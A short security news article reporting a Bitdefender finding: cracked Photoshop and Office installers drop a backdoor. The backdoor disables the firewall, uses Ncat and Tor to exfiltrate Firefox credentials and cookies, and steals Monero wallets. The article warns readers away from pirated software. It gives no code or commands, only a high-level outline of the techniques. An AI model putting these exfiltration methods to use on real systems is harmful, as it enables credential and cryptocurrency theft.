Software Cracks Could Empty Monero Wallets and Steal your Data

• A new campaign is distributing a nasty backdoor through Photoshop and MS Office cracks.
• The malware can steal entire Monero wallets, as well as exfiltrate Firefox browsing data.
• Instead of downloading and executing pirate software cracks, you could be using a free-software alternative.

According to a Bitdefender report, there’s a rise of a new type of malware attack taking place through software cracks for Microsoft Office and Adobe Photoshop CC, two tools that are widely used and equally widely pirated. These cracks actually work in unlocking the aforementioned products but also deliver a nasty backdoor onto the victim’s machine. If that person happens to hold Monero wallets, the actors will get to steal it, along with browser data and other sensitive information.

The distribution of these cracks mostly concerns the United States, India, Canada, Greece, Germany, Italy, Spain, South Africa, and the United Kingdom. We don’t know if the campaigners are purposefully targeting these countries because they have higher Monero ownership rates or higher piracy, but Bitdefender reports that the actors are showing impressive levels of adaptation based on the shifting interests.

Some of the features of the backdoor that is dropped by the crack executables include the following:

• Data exfiltration through BitTorrent client, which is launched by the malware.
• Firewall deactivation to minimize interruptions during exfiltration.
• Use of Ncat to receive local files and passing them through Tor and onto the C2.
• Scheduling exfiltration tasks every 45 minutes.

The goal is to steal Firefox browser profile data like history, credentials, and session cookies. These are archived in a 7zip form, so they are sent to the C2 in one package. The second goal is to steal the local Monero wallet via the CLI client ‘monero-wallet-cli.exe’. The actors could easily add more capabilities onto their backdoor, and they may soon do.

Even if the crack you just downloaded works as promised, it doesn’t mean that you have not been infected by malware. Crooks don’t distribute these files for the greater good. If you don’t want to pay the amount required to legitimately purchase these products, consider using open source and free alternatives such as LibreOffice and Gimp. You might be surprised how capable these tools are.